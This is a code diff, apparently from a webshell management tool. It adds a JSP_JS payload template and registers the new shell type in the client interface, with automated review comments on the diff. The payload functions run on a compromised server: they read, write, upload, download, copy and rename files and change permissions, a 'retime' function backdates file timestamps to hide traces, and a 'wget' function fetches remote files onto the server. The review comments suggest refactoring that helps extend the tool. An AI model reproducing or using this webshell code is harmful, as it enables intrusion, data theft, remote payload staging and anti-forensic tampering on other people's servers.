var fileHexContext = strtohexstr(fileContext);
var f = new File(filePath);
var os = new FileOutputStream(f);
for (var i = 0; i < fileHexContext.length(); i += 2) {
os.write(
(h.indexOf(fileHexContext.charAt(i)) << 4) |
h.indexOf(fileHexContext.charAt(i + 1))
);
}
os.close();
return "1";
}
function strtohexstr(fileContext) {
var h = "0123456789ABCDEF";
var bytes = fileContext.getBytes(cs);
var sb = new StringBuilder(bytes.length * 2);
for (var i = 0; i < bytes.length; i++) {
sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
}
return sb.toString();
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(WriteFileCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::content}",
},
read_file: {
_: `
function ReadFileCode(filePath) {
var l = "";
var s = "";
var br = new BufferedReader(
new InputStreamReader(new FileInputStream(new File(filePath)), cs)
);
while ((l = br.readLine()) != null) {
s += l + "\\r\\n";
}
br.close();
return s;
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(ReadFileCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
copy: {
_: `
function CopyFileOrDirCode(sourceFilePath, targetFilePath) {
var sf = new File(sourceFilePath),
df = new File(targetFilePath);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
var z = sf.listFiles();
for (var j = 0; j < z.length; j++) {
CopyFileOrDirCode(
sourceFilePath + "/" + z[j].getName(),
targetFilePath + "/" + z[j].getName()
);
}
} else {
var is = new FileInputStream(sf);
var os = new FileOutputStream(df);
var n;
var byteArray = Java.type("byte[]");
var b = new byteArray(1024);
while ((n = is.read(b, 0, 1024)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(CopyFileOrDirCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::target}",
},
download_file: {
_: `
function DownloadFileCode(filePath, r) {
var n;
var byteArray = Java.type("byte[]");
var b = new byteArray(512);
r.reset();
var os = r.getOutputStream();
var is = new BufferedInputStream(new FileInputStream(filePath));
os.write(tag_s.getBytes());
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(tag_e.getBytes());
os.close();
is.close();
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(DownloadFileCode(z1, response));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
upload_file: {
_: `
function UploadFileCode(savefilePath, fileHexContext) {
var h = "0123456789ABCDEF";
var f = new File(savefilePath);
f.createNewFile();
var os = new FileOutputStream(f, true);
for (var i = 0; i < fileHexContext.length(); i += 2) {
os.write(
(h.indexOf(fileHexContext.charAt(i)) << 4) |
h.indexOf(fileHexContext.charAt(i + 1))
);
}
os.close();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(UploadFileCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{buffer::content}",
},
rename: {
_: `
function RenameFileOrDirCode(oldName, newName) {
var sf = new File(oldName),
df = new File(newName);
sf.renameTo(df);
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(RenameFileOrDirCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::name}",
},
retime: {
_: `
function ModifyFileOrDirTimeCode(fileOrDirPath, aTime) {
var f = new File(fileOrDirPath);
var fm = new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
var dt = fm.parse(aTime);
f.setLastModified(dt.getTime());
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(ModifyFileOrDirTimeCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::time}",
},
chmod: {
_: `
function ChmodCode(path, permstr) {
try {
var permissions = Integer.parseInt(permstr, 8);
var f = new File(path);
if ((permissions & 256) > 0) {
f.getClass().getDeclaredMethod("setReadable").invoke(f, true, true);
}
if ((permissions & 128) > 0) {
f.getClass().getDeclaredMethod("setWritable").invoke(f, true, true);
}
if ((permissions & 64) > 0) {
f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, true);
}
if ((permissions & 32) > 0) {
f.getClass().getDeclaredMethod("setReadable").invoke(f, true, false);
}
if ((permissions & 16) > 0) {
f.getClass().getDeclaredMethod("setWritable").invoke(f, true, false);
}
if ((permissions & 8) > 0) {
f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, false);
}
if ((permissions & 4) > 0) {
f.getClass().getDeclaredMethod("setReadable").invoke(f, true, false);
}
if ((permissions & 2) > 0) {
f.getClass().getDeclaredMethod("setWritable").invoke(f, true, false);
}
if ((permissions & 1) > 0) {
f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, false);
}
} catch (e) {
return "0";
}
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(ChmodCode(z1, z2));`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::mode}",
},
mkdir: {
_: `
function CreateDirCode(dirPath) {
var f = new File(dirPath);
f.mkdir();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(CreateDirCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
wget: {
_: `
function WgetCode(urlPath, saveFilePath) {
var u = new java.net.URL(urlPath);
var n = 0;
var os = new FileOutputStream(saveFilePath);
var h = u.openConnection();
var is = h.getInputStream();
var byteArray = Java.type("byte[]");
var b = new byteArray(1024);
while ((n = is.read(b)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(WgetCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::url}",
[arg2]: "#{newbase64::path}",
},
});
......@@ -65,6 +65,11 @@ class Encoders {
icon: 'file-code-o',
type: 'button',
text: "JSP"
}, {
id: 'new_jsp_js',
icon: 'file-code-o',
type: 'button',
text: "JSP_JS"
}, {
type: 'separator'
}, {
......@@ -96,6 +101,11 @@ class Encoders {
icon: 'file-code-o',
type: 'button',
text: "JSP"
}, {
id: 'new_jsp_js_decoder',
icon: 'file-code-o',
type: 'button',
text: "JSP_JS"
}, {
type: 'separator'
}, {
......@@ -143,6 +153,9 @@ class Encoders {
case "new_jsp":
that.createEncoder(id);
break;
case "new_jsp_js":
that.createEncoder(id);
break;
case "new_php":
case "new_php_rsa":
that.createEncoder(id);
......@@ -156,6 +169,9 @@ class Encoders {
case "new_jsp_decoder":
that.createEncoder(id, 'decoder');
break;
case "new_jsp_js_decoder":
that.createEncoder(id, 'decoder');
break;
case "new_custom_decoder":
that.createEncoder(id, 'decoder');
break;
......@@ -195,6 +211,7 @@ class Encoders {
combobox.put("aspx", "ASPX");
combobox.put("php", "PHP");
combobox.put("jsp", "JSP");
combobox.put("jsp_js", "JSP_JS");
combobox.put("custom", "CUSTOM");
grid.attachEvent("onEditCell", function (stage, rId, cInd, nValue, oValue) {
......@@ -226,7 +243,7 @@ class Encoders {
break
case 2:
// type
if (nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "jsp"&& nValue != "custom") {
if (nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "jsp"&& nValue != "jsp_js"&&nValue != "custom") {
toastr.error(LANG['message']["etype_error"], LANG_T['error']);
return
}
......@@ -766,6 +783,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
var encoders_path = {
......@@ -773,6 +791,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
let userencoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
......@@ -780,7 +799,7 @@ module.exports = {
!fs.existsSync(userencoder_path) ?
fs.mkdirSync(userencoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp','jsp_js' , 'custom'].map((t) => {
!fs.existsSync(path.join(userencoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
null;
......@@ -815,6 +834,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
var decoders_path = {
......@@ -822,6 +842,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
......@@ -829,7 +850,7 @@ module.exports = {
!fs.existsSync(userdecoder_path) ?
fs.mkdirSync(userdecoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp','jsp_js', 'custom'].map((t) => {
!fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
null;
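Review bot: The type check under `case 2:` (hunk at -226) is now a six-term `!=` chain with uneven spacing. The same list of type names is spelled out again in the two `.map` calls (hunks at -780 and -829) and in the `combobox.put` calls, so each new type has to be added by hand in every place. Keeping the allowlist in one constant, `const SHELL_TYPES = ['asp', 'aspx', 'php', 'jsp', 'jsp_js', 'custom'];`, and writing the check as `if (!SHELL_TYPES.includes(nValue)) {` would prevent the copies from drifting apart. The new `case "new_jsp_js":` and `case "new_jsp_js_decoder":` arms could also fall through to the existing `new_jsp` arms, as `new_php`/`new_php_rsa` already do. The enclosing functions start and end outside these hunks.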
......
......@@ -268,6 +268,7 @@ class Form {
"aspx": /.+\.as(px|mx)/,
"asp": /.+\.(as(p|a|hx)|c(dx|er))/,
"jsp": /.+\.(jsp[x]?)/,
"jsp": /.+\.(jsp[x]?)/,
"custom": /.+\.((jsp[x]?)|cgi)/
}
let typecombo = form.getCombo('type');
......@@ -279,6 +280,8 @@ class Form {
typecombo.selectOption(typecombo.getOption('asp').index);
} else if (file_match.jsp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('jsp').index);
} else if (file_match.jsp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('jsp_js').index);
} else if (file_match.custom.test(id) == true) {
typecombo.selectOption(typecombo.getOption('custom').index);
}
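Review bot: The `file_match` object in the first hunk now has two identical `"jsp": /.+\.(jsp[x]?)/` entries, so the added line only repeats the existing key and defines nothing for `jsp_js`. In the second hunk the new `else if (file_match.jsp.test(id) == true)` branch repeats the condition of the branch directly above it, so the `typecombo.getOption('jsp_js')` line can never run. Both types share the `.jsp`/`.jspx` extension, so the file name alone cannot tell them apart. Unless another signal is available, drop the duplicate key and the unreachable branch and leave `jsp_js` as a manual choice in the combo. The enclosing method starts and ends outside both hunks.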
......